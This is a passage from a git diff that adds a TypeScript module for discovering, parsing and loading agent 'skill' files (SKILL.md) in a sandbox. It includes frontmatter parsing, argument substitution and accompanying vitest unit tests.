+import { getSandboxSkillDirectories } from "@/lib/skills/getSandboxSkillDirectories";
+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+
+vi.mock("@/lib/sandbox/resolveSandboxHomeDirectory", () => ({
+  resolveSandboxHomeDirectory: vi.fn(),
+})); // swap the real resolver for a stub that each test configures
+
+beforeEach(() => vi.clearAllMocks()); // reset recorded vi.fn calls between tests
+
+describe("getSandboxSkillDirectories", () => {
+  it("returns just the global skill dir under the resolved $HOME", async () => {
+    vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/home/vercel-sandbox");
+    const dirs = await getSandboxSkillDirectories({ workingDirectory: "/sandbox/mono" } as never);
+    expect(dirs).toEqual(["/home/vercel-sandbox/.agents/skills"]); // the working directory contributes no entry
+  });
+
+  it("works with the /root fallback (open-agents base image)", async () => {
+    vi.mocked(resolveSandboxHomeDirectory).mockResolvedValue("/root");
+    const dirs = await getSandboxSkillDirectories({ workingDirectory: "/x" } as never);
+    expect(dirs).toEqual(["/root/.agents/skills"]);
+  });
+});
diff --git a/lib/skills/__tests__/getSkills.test.ts b/lib/skills/__tests__/getSkills.test.ts
new file mode 100644
index 000000000..8ffd47e24
--- /dev/null
+++ b/lib/skills/__tests__/getSkills.test.ts
@@ -0,0 +1,31 @@
+import { describe, it, expect } from "vitest";
+import { getSkills } from "@/lib/skills/getSkills";
+
+const validCtx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, // used below as the valid context shape
+};
+
+const sample = {
+  name: "recoup-api",
+  description: "Recoupable API skill",
+  path: "/home/vercel-sandbox/.agents/skills/recoup-api",
+  filename: "SKILL.md",
+  options: {},
+};
+
+describe("getSkills", () => {
+  it("returns the skills array when present in a valid AgentContext", () => {
+    expect(getSkills({ ...validCtx, skills: [sample] })).toEqual([sample]);
+  });
+
+  it("returns [] when no skills field is set", () => {
+    expect(getSkills(validCtx)).toEqual([]); // valid context without a `skills` key
+  });
+
+  it("returns [] for malformed contexts (non-AgentContext shape)", () => {
+    expect(getSkills(undefined)).toEqual([]);
+    expect(getSkills(null)).toEqual([]);
+    expect(getSkills({ noSandbox: true })).toEqual([]); // no `sandbox` key at all
+    expect(getSkills({ sandbox: null })).toEqual([]); // `sandbox` key present but null
+  });
+});
diff --git a/lib/skills/__tests__/injectSkillDirectory.test.ts b/lib/skills/__tests__/injectSkillDirectory.test.ts
new file mode 100644
index 000000000..ac6d646bb
--- /dev/null
+++ b/lib/skills/__tests__/injectSkillDirectory.test.ts
@@ -0,0 +1,14 @@
+import { describe, it, expect } from "vitest";
+import { injectSkillDirectory } from "@/lib/skills/injectSkillDirectory";
+
+describe("injectSkillDirectory", () => {
+  it("prepends a `Skill directory: <path>` header followed by a blank line", () => {
+    expect(injectSkillDirectory("body content", "/skills/foo")).toBe(
+      "Skill directory: /skills/foo\n\nbody content",
+    );
+  });
+
+  it("works with empty body", () => {
+    expect(injectSkillDirectory("", "/skills/foo")).toBe("Skill directory: /skills/foo\n\n"); // header and blank line are still emitted
+  });
+});
diff --git a/lib/skills/__tests__/parseSkillFrontmatter.test.ts b/lib/skills/__tests__/parseSkillFrontmatter.test.ts
new file mode 100644
index 000000000..91dfcf7c1
--- /dev/null
+++ b/lib/skills/__tests__/parseSkillFrontmatter.test.ts
@@ -0,0 +1,56 @@
+import { describe, it, expect } from "vitest";
+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+
+describe("parseSkillFrontmatter", () => {
+  it("parses a minimal frontmatter (name + description)", () => {
+    const md = `---\nname: commit\ndescription: Make a git commit\n---\n\nBody.`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return; // narrows `result` so `.data` is accessible below
+    expect(result.data.name).toBe("commit");
+    expect(result.data.description).toBe("Make a git commit");
+  });
+
+  it("unwraps double-quoted values (including escaped quotes)", () => {
+    const md = `---\nname: foo\ndescription: "Has \\"quotes\\" inside"\n---\nbody`; // `\\"` here is a literal backslash + quote in the file content
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe('Has "quotes" inside');
+  });
+
+  it("parses booleans for unquoted true/false", () => {
+    const md = `---\nname: foo\ndescription: bar\ndisable-model-invocation: true\nuser-invocable: false\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data["disable-model-invocation"]).toBe(true);
+    expect(result.data["user-invocable"]).toBe(false);
+  });
+
+  it("treats `true`/`false` inside quotes as strings (not booleans)", () => {
+    const md = `---\nname: foo\ndescription: "true"\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe("true"); // the string "true", not the boolean
+  });
+
+  it("returns success:false when frontmatter is missing", () => {
+    const result = parseSkillFrontmatter("just markdown, no frontmatter");
+    expect(result.success).toBe(false);
+  });
+
+  it("returns success:false when required fields are absent", () => {
+    const result = parseSkillFrontmatter(`---\nname: only-name\n---\nbody`); // no `description` key
+    expect(result.success).toBe(false);
+  });
+
+  it("preserves colons in values (e.g. URLs)", () => {
+    const md = `---\nname: foo\ndescription: see https://example.com\n---\nbody`;
+    const result = parseSkillFrontmatter(md);
+    expect(result.success).toBe(true);
+    if (!result.success) return;
+    expect(result.data.description).toBe("see https://example.com");
+  });
+});
diff --git a/lib/skills/__tests__/substituteArguments.test.ts b/lib/skills/__tests__/substituteArguments.test.ts
new file mode 100644
index 000000000..db4fb0aa9
--- /dev/null
+++ b/lib/skills/__tests__/substituteArguments.test.ts
@@ -0,0 +1,22 @@
+import { describe, it, expect } from "vitest";
+import { substituteArguments } from "@/lib/skills/substituteArguments";
+
+describe("substituteArguments", () => {
+  it("replaces $ARGUMENTS with the provided args", () => {
+    expect(substituteArguments("run with $ARGUMENTS", "--flag value")).toBe(
+      "run with --flag value",
+    );
+  });
+
+  it("replaces all occurrences", () => {
+    expect(substituteArguments("$ARGUMENTS / $ARGUMENTS", "x")).toBe("x / x");
+  });
+
+  it("substitutes empty string when args are undefined", () => {
+    expect(substituteArguments("run with $ARGUMENTS", undefined)).toBe("run with "); // the space before the placeholder is kept
+  });
+
+  it("leaves text unchanged when $ARGUMENTS is absent", () => {
+    expect(substituteArguments("no placeholder here", "ignored")).toBe("no placeholder here");
+  });
+});
diff --git a/lib/skills/discoverSkills.ts b/lib/skills/discoverSkills.ts
new file mode 100644
index 000000000..9ae0ced67
--- /dev/null
+++ b/lib/skills/discoverSkills.ts
@@ -0,0 +1,89 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { findSkillFile } from "@/lib/skills/findSkillFile";
+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Built-in commands that skills cannot shadow. Skills with these names
+ * would be unreachable via slash command, so we drop them at discovery.
+ */
+const BUILTIN_COMMANDS = ["model", "resume", "new"];
+
+/**
+ * Scan a list of directories for skills. Each directory is expected to
+ * contain one subdirectory per skill, with a SKILL.md (or skill.md)
+ * inside. Returns metadata for everything discoverable; silently skips
+ * non-directories, missing files, malformed frontmatter, and names that
+ * shadow built-in slash commands.
+ *
+ * Dedupes by name (case-insensitive); first-wins across directories so
+ * callers can list project skills before global skills and have project
+ * shadow global.
+ *
+ * @param sandbox - Connected sandbox for file ops.
+ * @param directories - Absolute paths to scan.
+ * @returns Metadata for each discovered skill, in scan order.
+ */
+export async function discoverSkills(
+  sandbox: Sandbox,
+  directories: string[],
+): Promise<SkillMetadata[]> {
+  const skills: SkillMetadata[] = [];
+  const seen = new Set<string>();
+
+  for (const dir of directories) {
+    let entries;
+    try {
+      const stat = await sandbox.stat(dir);
+      if (!stat.isDirectory()) continue;
+      entries = await sandbox.readdir(dir, { withFileTypes: true });
+    } catch {
+      continue; // directory is missing or unreadable
+    }
+
+    for (const entry of entries) {
+      if (!entry.isDirectory()) continue;
+
+      // Paths live inside the sandbox, so always join with POSIX
+      // separators regardless of the host OS running this code (this
+      // matches `getGlobalSkillsDirectory`, which uses `path.posix`).
+      const skillDir = path.posix.join(dir, entry.name);
+      const skillFile = await findSkillFile(sandbox, skillDir);
+      if (!skillFile) continue;
+
+      let content: string;
+      try {
+        content = await sandbox.readFile(skillFile, "utf-8");
+      } catch {
+        continue;
+      }
+
+      const parsed = parseSkillFrontmatter(content);
+      if (!parsed.success) continue;
+      const frontmatter = parsed.data;
+
+      // Lowercase once; used for both the built-in check and the dedupe key.
+      const normalized = frontmatter.name.toLowerCase();
+      if (BUILTIN_COMMANDS.includes(normalized)) {
+        console.warn(
+          `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`,
+        );
+        continue;
+      }
+
+      if (seen.has(normalized)) continue;
+      seen.add(normalized);
+
+      skills.push({
+        name: frontmatter.name,
+        description: frontmatter.description,
+        path: skillDir,
+        filename: path.basename(skillFile),
+        options: frontmatterToOptions(frontmatter),
+      });
+    }
+  }
+
+  return skills;
+}
diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts
new file mode 100644
index 000000000..d1dcb3f5e
--- /dev/null
+++ b/lib/skills/extractSkillBody.ts
@@ -0,0 +1,14 @@
+/**
+ * Return the markdown body of a SKILL.md file with its leading YAML
+ * frontmatter block removed. When the content has no frontmatter the
+ * whole content is returned. The result is always trimmed.
+ *
+ * @param fileContent - Full file content read from sandbox.
+ * @returns The trimmed markdown body.
+ */
+export function extractSkillBody(fileContent: string): string {
+  const frontmatterBlock = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/.exec(fileContent);
+  // No frontmatter → skip zero characters, i.e. keep the whole content.
+  const bodyStart = frontmatterBlock ? frontmatterBlock[0].length : 0;
+  return fileContent.slice(bodyStart).trim();
+}
diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts
new file mode 100644
index 000000000..a81b9e415
--- /dev/null
+++ b/lib/skills/findSkillFile.ts
@@ -0,0 +1,33 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+
+/**
+ * Locate the SKILL.md file inside a candidate skill directory. Prefers
+ * uppercase `SKILL.md` (the project convention) but falls back to
+ * lowercase `skill.md` for skills that ship the lowercase name. Returns
+ * `null` when neither file exists so callers can skip the entry.
+ *
+ * Probes via `sandbox.access` (which throws on missing) rather than
+ * `readdir` so we don't pay the cost of listing a directory whose
+ * contents we don't otherwise need.
+ *
+ * @param sandbox - Connected sandbox handle.
+ * @param skillDir - Absolute path to the candidate skill directory.
+ * @returns Path of the first candidate that exists, or `null`.
+ */
+export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise<string | null> {
+  // Ordered by preference: the first accessible name wins.
+  for (const filename of ["SKILL.md", "skill.md"]) {
+    // `skillDir` is a path inside the sandbox, so join with POSIX
+    // separators regardless of the host OS (as `getGlobalSkillsDirectory`
+    // does) instead of the host-dependent `path.join`.
+    const candidate = path.posix.join(skillDir, filename);
+    try {
+      await sandbox.access(candidate);
+      return candidate;
+    } catch {
+      // not accessible — try the next candidate
+    }
+  }
+  return null;
+}
diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts
new file mode 100644
index 000000000..788a6dfc7
--- /dev/null
+++ b/lib/skills/getGlobalSkillsDirectory.ts
@@ -0,0 +1,14 @@
+import * as path from "path";
+
+/**
+ * Build the absolute path of the global skills directory for a given
+ * `$HOME`, i.e. `<home>/.agents/skills`. `installSessionGlobalSkills`
+ * lays skills down there at sandbox provisioning time via
+ * `npx skills add ... -g` (today: `recoup-api`, `artist-workspace`).
+ *
+ * @param homeDirectory - Sandbox $HOME, e.g. `/home/vercel-sandbox` or `/root`.
+ */
+export function getGlobalSkillsDirectory(homeDirectory: string): string {
+  const relativeSkillsPath = ".agents/skills";
+  return path.posix.join(homeDirectory, relativeSkillsPath);
+}
diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts
new file mode 100644
index 000000000..81645ea46
--- /dev/null
+++ b/lib/skills/getSandboxSkillDirectories.ts
@@ -0,0 +1,16 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+/**
+ * Build the list of directories to scan for skills in a sandbox. The
+ * list currently has a single entry — `${HOME}/.agents/skills/` —
+ * because all skills are provisioned globally at sandbox startup via
+ * `installSessionGlobalSkills` rather than bundled into the cloned repo.
+ *
+ * @param sandbox - Connected sandbox handle.
+ */
+export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise<string[]> {
+  const globalSkillsDir = getGlobalSkillsDirectory(await resolveSandboxHomeDirectory(sandbox));
+  return [globalSkillsDir];
+}
diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts
new file mode 100644
index 000000000..d2d29ed7d
--- /dev/null
+++ b/lib/skills/getSkills.ts
@@ -0,0 +1,22 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Accessor for the discovered skill catalog carried on the agent's
+ * `experimental_context`. The chat handler populates it via
+ * `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))` before
+ * workflow start and threads it through as `AgentContext.skills`.
+ *
+ * Kept in its own file so consumers (the `skill` tool today, skill-aware
+ * system prompts later) share one accessor instead of re-casting the context.
+ *
+ * @param experimental_context - Opaque context object passed by AI SDK to tool execute.
+ * @returns The catalog, or `[]` for a non-AgentContext value or when none is set.
+ */
+export function getSkills(experimental_context: unknown): SkillMetadata[] {
+  if (isAgentContext(experimental_context)) {
+    const { skills } = experimental_context as { skills?: SkillMetadata[] };
+    return skills ?? [];
+  }
+  return [];
+}
diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts
new file mode 100644
index 000000000..cf4bf58d5
--- /dev/null
+++ b/lib/skills/injectSkillDirectory.ts
@@ -0,0 +1,11 @@
+/**
+ * Prefix a skill body with a `Skill directory: <absolute-path>` header
+ * and a blank line, so the model can construct full paths to scripts and
+ * resources living alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`).
+ *
+ * @param body - Skill body (after frontmatter strip).
+ * @param skillDir - Absolute sandbox path to the skill directory.
+ */
+export function injectSkillDirectory(body: string, skillDir: string): string {
+  return ["Skill directory: " + skillDir, "", body].join("\n");
+}
diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts
new file mode 100644
index 000000000..3d2888d76
--- /dev/null
+++ b/lib/skills/parseSkillFrontmatter.ts
@@ -0,0 +1,52 @@
+import { skillFrontmatterSchema } from "@/lib/skills/skillTypes";
+
+/**
+ * Parse YAML frontmatter from SKILL.md content. Returns the Zod
+ * `safeParse` shape so callers can branch cleanly on success.
+ *
+ * Intentionally a hand-rolled subset of YAML (one-line `key: value`
+ * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't
+ * pull a YAML dep just to read a 3-line block.
+ *
+ * @param content - Full SKILL.md content (including the leading `---`).
+ */
+export function parseSkillFrontmatter(
+  content: string,
+): ReturnType<typeof skillFrontmatterSchema.safeParse> {
+  const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
+  if (!match?.[1]) {
+    return {
+      success: false,
+      error: new Error("No frontmatter found") as never,
+    };
+  }
+
+  const parsed: Record<string, unknown> = {};
+
+  for (const line of match[1].split("\n")) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith("#")) continue;
+
+    const colonIndex = trimmed.indexOf(":");
+    if (colonIndex === -1) continue;
+
+    const key = trimmed.slice(0, colonIndex).trim();
+    // Only split on the first colon so values like URLs stay intact.
+    let value: string | boolean = trimmed.slice(colonIndex + 1).trim();
+    // A lone quote character is not a quoted string: require 2+ chars to unwrap.
+    const quoted = value.length >= 2;
+    if (quoted && value.startsWith('"') && value.endsWith('"')) {
+      value = value.slice(1, -1).replace(/\\"/g, '"');
+    } else if (quoted && value.startsWith("'") && value.endsWith("'")) {
+      value = value.slice(1, -1).replace(/\\'/g, "'");
+    } else if (value === "true") {
+      value = true;
+    } else if (value === "false") {
+      value = false;
+    }
+
+    parsed[key] = value;
+  }
+
+  return skillFrontmatterSchema.safeParse(parsed);
+}
diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts
new file mode 100644
index 000000000..77fffd055
--- /dev/null
+++ b/lib/skills/skillTypes.ts
@@ -0,0 +1,76 @@
+import { z } from "zod";
+
+/**
+ * Zod schema for the frontmatter block at the top of a SKILL.md file.
+ * Only `name` and `description` are required; all other keys are optional.
+ */
+export const skillFrontmatterSchema = z.object({
+  name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"),
+  description: z
+    .string()
+    .min(1, "Skill description cannot be empty")
+    .describe("Short description for the agent"),
+  version: z.string().optional().describe("Skill version"),
+  "disable-model-invocation": z
+    .boolean()
+    .optional()
+    .describe("If true, the model cannot invoke this skill automatically"),
+  "user-invocable": z
+    .boolean()
+    .optional()
+    .describe("If false, users cannot invoke this skill via slash command"),
+  "allowed-tools": z
+    .string()
+    .optional()
+    .describe("Comma-separated list of allowed tools when skill is active"),
+  context: z.enum(["fork"]).optional().describe("Execution context for the skill"),
+  agent: z.string().optional().describe("Agent type to use for execution"),
+});
+
+export type SkillFrontmatter = z.infer<typeof skillFrontmatterSchema>; // keys stay kebab-case, exactly as declared in the schema
+
+/**
+ * Normalized skill options produced by `frontmatterToOptions` — camelCase
+ * fields, comma-separated lists pre-split. Every field is optional.
+ */
+export interface SkillOptions {
+  disableModelInvocation?: boolean; // from `disable-model-invocation`
+  userInvocable?: boolean; // from `user-invocable`
+  allowedTools?: string[]; // from `allowed-tools`, split on commas and trimmed
+  context?: "fork"; // copied through unchanged
+  agent?: string; // copied through unchanged
+}
+
+/**
+ * Skill metadata stored on `AgentContext.skills`. Contains only what
+ * `skillTool` needs at invocation time — the SKILL.md body is loaded
+ * lazily.
+ */
+export interface SkillMetadata {
+  /** Skill name as written in frontmatter (original casing preserved). */
+  name: string;
+  /** Short description from frontmatter, intended for the agent. */
+  description: string;
+  /** Absolute sandbox path to the skill directory. */
+  path: string;
+  /** Basename of the skill file inside `path` (`SKILL.md` or `skill.md`). */
+  filename: string;
+  /** Normalized options derived from the frontmatter. */
+  options: SkillOptions;
+}
+
+/**
+ * Convert validated frontmatter into {@link SkillOptions}: kebab-case
+ * keys become camelCase and `allowed-tools` is split on commas.
+ */
+export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions {
+  const { context, agent } = frontmatter;
+  // Trim each entry and drop empty ones; undefined when the key is absent.
+  const allowedTools = frontmatter["allowed-tools"]
+    ?.split(",")
+    .map(tool => tool.trim())
+    .filter(tool => tool.length > 0);
+  const disableModelInvocation = frontmatter["disable-model-invocation"];
+  const userInvocable = frontmatter["user-invocable"];
+  return { disableModelInvocation, userInvocable, allowedTools, context, agent };
+}
diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts
new file mode 100644
index 000000000..44500bc58
--- /dev/null
+++ b/lib/skills/substituteArguments.ts
@@ -0,0 +1,14 @@
+/**
+ * Replace all occurrences of `$ARGUMENTS` in a skill body with the
+ * provided args string (or empty string when no args were passed).
+ * Used by `skillTool` after loading SKILL.md so slash-command-style
+ * invocations like `/commit -m "fix"` thread the arg suffix through.
+ *
+ * @param body - Skill body (markdown after frontmatter).
+ * @param args - Optional arguments passed by the model.
+ */
+export function substituteArguments(body: string, args?: string): string {
+  // Replacer function, not a string: a string replacement would expand
+  // `$&`, `$$`, `$1`… inside model-supplied args instead of inserting them.
+  return body.replace(/\$ARGUMENTS/g, () => args ?? "");
+}